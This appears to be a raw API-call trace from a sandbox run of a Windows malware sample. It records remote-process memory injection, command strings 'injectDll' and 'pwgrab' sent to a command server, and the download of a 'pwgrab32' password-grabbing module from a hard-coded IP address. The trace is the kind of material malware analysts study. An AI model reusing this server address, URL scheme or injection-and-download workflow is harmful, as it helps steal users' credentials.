	[0194.022] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x127eb4, nSize=0x70, lpNumberOfBytesRead=0x127e94 | out: lpBuffer=0x127eb4*, lpNumberOfBytesRead=0x127e94*=0x70) returned 1
	[0194.022] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6298
	[0194.022] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x2c, flAllocationType=0x3000, flProtect=0x40) returned 0x5e0000
	[0194.022] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x5e0000, lpBuffer=0x22a6298*, nSize=0x2c, lpNumberOfBytesWritten=0x127e8c | out: lpBuffer=0x22a6298*, lpNumberOfBytesWritten=0x127e8c*=0x2c) returned 1
	[0194.022] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x127eb4*, nSize=0x70, lpNumberOfBytesWritten=0x127e8c | out: lpBuffer=0x127eb4*, lpNumberOfBytesWritten=0x127e8c*=0x70) returned 1
	[0194.023] ResetEvent (hEvent=0x478) returned 1
	[0194.023] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0194.025] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x127eb4, nSize=0x70, lpNumberOfBytesRead=0x127e8c | out: lpBuffer=0x127eb4*, lpNumberOfBytesRead=0x127e8c*=0x70) returned 1
	[0194.025] VirtualFreeEx (hProcess=0x47c, lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0194.025] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6298) returned 1
	[0194.025] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x5c0000, lpBuffer=0x1283c0, nSize=0x80, lpNumberOfBytesRead=0x127f48 | out: lpBuffer=0x1283c0*, lpNumberOfBytesRead=0x127f48*=0x80) returned 1
	[0194.025] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x240000, lpBuffer=0x127fc0, nSize=0x400, lpNumberOfBytesRead=0x127f48 | out: lpBuffer=0x127fc0*, lpNumberOfBytesRead=0x127f48*=0x400) returned 1
	[0194.025] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x5d0004, lpBuffer=0x127f74, nSize=0x4, lpNumberOfBytesRead=0x127f48 | out: lpBuffer=0x127f74*, lpNumberOfBytesRead=0x127f48*=0x4) returned 1
	[0194.025] VirtualFreeEx (hProcess=0x47c, lpAddress=0x5d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0194.025] VirtualFreeEx (hProcess=0x47c, lpAddress=0x5c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0194.025] VirtualFreeEx (hProcess=0x47c, lpAddress=0x230000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0194.026] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0194.026] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ca9a0) returned 1
	[0194.026] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26ce2e8) returned 1
	[0194.026] VirtualFreeEx (hProcess=0x47c, lpAddress=0x200000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0194.026] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0194.026] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23079d8) returned 1
	[0194.026] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2310cd0) returned 1
	[0194.026] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310cd0
	[0194.026] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad348
	[0194.026] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2307898) returned 1
	[0194.026] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad378) returned 1
	[0194.026] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad228) returned 1
	[0194.026] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad1b0) returned 1
	[0194.026] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad000) returned 1
	[0194.026] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6490) returned 1
	[0194.026] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c6db0
	[0194.026] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0194.026] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0194.026] WinHttpOpenRequest (hConnect=0x227d8a0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/10/62/TJWNEPFVLB/1/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0194.027] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x128aec, dwBufferLength=0x4) returned 1
	[0194.027] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0194.291] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0194.293] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128adc, lpdwBufferLength=0x128ad8, lpdwIndex=0x0 | out: lpBuffer=0x128adc*, lpdwBufferLength=0x128ad8*=0x4, lpdwIndex=0x0) returned 1
	[0194.293] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x242550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1
	[0194.294] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad228
	[0194.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x242550, cbMultiByte=-1, lpWideCharStr=0x22ad228, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0194.295] CryptBinaryToStringW (in: pbBinary=0x2425d0, cbBinary=0x7, dwFlags=0x1, pszString=0x0, pcchString=0x128ab0 | out: pszString=0x0, pcchString=0x128ab0) returned 1
	[0194.295] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263898
	[0194.295] CryptBinaryToStringW (in: pbBinary=0x2425d0, cbBinary=0x7, dwFlags=0x80000001, pszString=0x263898, pcchString=0x128ab0 | out: pszString="U3VjY2Vzcw==\n", pcchString=0x128ab0) returned 1
	[0194.295] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0194.295] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0194.295] WinHttpOpenRequest (hConnect=0x227d8a0, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/63/injectDll/sTart/U3VjY2Vzcw==//", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0194.295] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x128ac4, dwBufferLength=0x4) returned 1
	[0194.295] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0194.725] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0194.725] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128ab4, lpdwBufferLength=0x128ab0, lpdwIndex=0x0 | out: lpBuffer=0x128ab4*, lpdwBufferLength=0x128ab0*=0x4, lpdwIndex=0x0) returned 1
	[0194.726] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263898) returned 1
	[0194.726] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad228) returned 1
	[0194.726] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2e8) returned 1
	[0194.726] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2e8
	[0194.726] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2307960, Size=0x20) returned 0x263898
	[0194.726] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c6db0) returned 1
	[0194.726] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6490
	[0194.726] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307960
	[0194.726] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5f50) returned 1
	[0194.726] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad318) returned 1
	[0194.726] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a79a8) returned 1
	[0194.726] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5bd0) returned 1
	[0194.726] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2307870) returned 1
	[0194.726] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078e8) returned 1
	[0194.726] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5bd0
	[0194.726] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad318
	[0194.726] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x70) returned 0x22a79a8
	[0194.726] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5f50
	[0194.726] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6298
	[0194.726] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078e8
	[0194.726] StrStrIW (lpFirst="pwgrab sTart", lpSrch=" ") returned=" sTart"
	[0194.726] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad228
	[0194.726] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad000
	[0194.726] lstrcpynW (in: lpString1=0x22ad000, lpString2="pwgrab sTart", iMaxLength=7 | out: lpString1="pwgrab") returned="pwgrab"
	[0194.726] StrStrIW (lpFirst="sTart", lpSrch=" ") returned 0x0
	[0194.727] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ad228, Size=0x10) returned 0x22ad378
	[0194.727] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad228
	[0194.727] lstrcpynW (in: lpString1=0x22ad228, lpString2="sTart", iMaxLength=6 | out: lpString1="sTart") returned="sTart"
	[0194.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sTart", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6
	[0194.727] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0a8
	[0194.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sTart", cchWideChar=-1, lpMultiByteStr=0x22ad0a8, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sTart", lpUsedDefaultChar=0x0) returned 6
	[0194.727] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307870
	[0194.727] lstrcmpiW (lpString1="injectDll32", lpString2="pwgrab32") returned -1
	[0194.727] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2307870) returned 1
	[0194.727] lstrcmpiW (lpString1="sTart", lpString2="start") returned 0
	[0194.727] lstrcmpiW (lpString1="sTart", lpString2="release") returned 1
	[0194.727] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307870
	[0194.727] lstrcmpiW (lpString1="injectDll32", lpString2="pwgrab32") returned -1
	[0194.727] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2307870) returned 1
	[0194.727] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307870
	[0194.727] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x279a30
	[0194.727] GetFullPathNameW (in: lpFileName="Data\\pwgrab32", nBufferLength=0x105, lpBuffer=0x279a30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32", lpFilePart=0x0) returned 0x3e
	[0194.727] GetFileAttributesW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32")) returned 0xffffffff
	[0194.727] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x279a30) returned 1
	[0194.727] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c4ea8
	[0194.728] WinHttpConnect (hSession=0x22c4ea8, pswzServerName="5.188.108.22", nServerPort=0x1bf, dwReserved=0x0) returned 0x22c4dc0
	[0194.728] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23079d8
	[0194.728] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5ab8
	[0194.728] WinHttpSetTimeouts (hInternet=0x22c4ea8, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0194.728] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/pwgrab32/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x271f00
	[0194.728] WinHttpSetOption (hInternet=0x271f00, dwOption=0x1f, lpBuffer=0x128240, dwBufferLength=0x4) returned 1
	[0194.728] WinHttpSendRequest (hRequest=0x271f00, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0194.970] WinHttpReceiveResponse (hRequest=0x271f00, lpReserved=0x0) returned 1
	[0194.971] WinHttpQueryHeaders (in: hRequest=0x271f00, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128230, lpdwBufferLength=0x12822c, lpdwIndex=0x0 | out: lpBuffer=0x128230*, lpdwBufferLength=0x12822c*=0x4, lpdwIndex=0x0) returned 1
	[0194.971] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0xee1) returned 1
	[0194.971] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xef0) returned 0x22efc68
	[0194.971] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x22efc68, dwNumberOfBytesToRead=0xee1, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x22efc68*, lpdwNumberOfBytesRead=0x12822c*=0xee1) returned 1
	[0194.971] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0194.971] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22efc68, Size=0x2ef0) returned 0x2690048
	[0194.971] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2690f29, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2690f29*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0194.971] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x101c) returned 1
	[0194.972] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2690048, Size=0x3f00) returned 0x2690048
	[0194.972] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2692f29, dwNumberOfBytesToRead=0x101c, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2692f29*, lpdwNumberOfBytesRead=0x12822c*=0x101c) returned 1
	[0194.972] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0194.972] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2690048, Size=0x5f00) returned 0x26cec08
	[0194.972] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x26d2b05, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x26d2b05*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0194.972] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0194.973] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x26cec08, Size=0x7f00) returned 0x26a4060
	[0194.973] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x26a9f5d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x26a9f5d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0194.973] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.006] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x26a4060, Size=0x9f00) returned 0x26a4060
	[0195.006] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x26abf5d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x26abf5d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.007] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.008] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x26a4060, Size=0xbf00) returned 0x26a4060
	[0195.009] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x26adf5d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x26adf5d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.009] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.009] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x26a4060, Size=0xdf00) returned 0x26a4060
	[0195.009] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x26aff5d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x26aff5d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.009] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.010] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x26a4060, Size=0xff00) returned 0x26a4060
	[0195.010] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x26b1f5d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x26b1f5d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.010] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.011] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x26a4060, Size=0x11f00) returned 0x26a4060
	[0195.011] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x26b3f5d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x26b3f5d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.011] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.011] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x26a4060, Size=0x13f00) returned 0x2732590
	[0195.013] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x274448d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x274448d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.013] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.013] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x15f00) returned 0x2732590
	[0195.013] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x274648d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x274648d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.013] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.014] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x17f00) returned 0x2732590
	[0195.014] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x274848d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x274848d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.014] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.043] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x19f00) returned 0x2732590
	[0195.043] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x274a48d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x274a48d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.043] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.044] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x1bf00) returned 0x2732590
	[0195.045] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x274c48d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x274c48d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.045] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.046] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x1df00) returned 0x2732590
	[0195.047] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x274e48d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x274e48d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.047] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.049] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x1ff00) returned 0x2732590
	[0195.049] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x275048d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x275048d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.049] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.050] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x21f00) returned 0x2772bb8
	[0195.052] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2792ab5, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2792ab5*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.052] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.053] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2772bb8, Size=0x23f00) returned 0x2772bb8
	[0195.053] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2794ab5, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2794ab5*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.053] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.053] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2772bb8, Size=0x25f00) returned 0x2772bb8
	[0195.053] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2796ab5, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2796ab5*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.053] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.054] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2772bb8, Size=0x27f00) returned 0x2772bb8
	[0195.054] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2798ab5, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2798ab5*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.054] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.054] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2772bb8, Size=0x29f00) returned 0x2772bb8
	[0195.054] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x279aab5, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x279aab5*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.054] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.055] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2772bb8, Size=0x2bf00) returned 0x2772bb8
	[0195.055] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x279cab5, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x279cab5*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
